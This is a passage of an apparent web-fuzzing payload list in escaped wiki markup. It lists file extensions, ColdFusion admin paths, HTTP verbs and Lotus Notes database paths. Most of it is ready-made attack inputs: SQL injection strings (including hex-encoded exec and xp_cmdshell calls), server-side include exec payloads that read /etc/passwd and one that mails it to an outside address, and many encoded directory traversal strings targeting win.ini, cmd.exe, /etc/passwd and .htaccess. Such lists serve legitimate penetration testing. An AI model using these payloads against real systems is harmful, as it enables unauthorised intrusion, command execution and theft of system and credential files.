.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
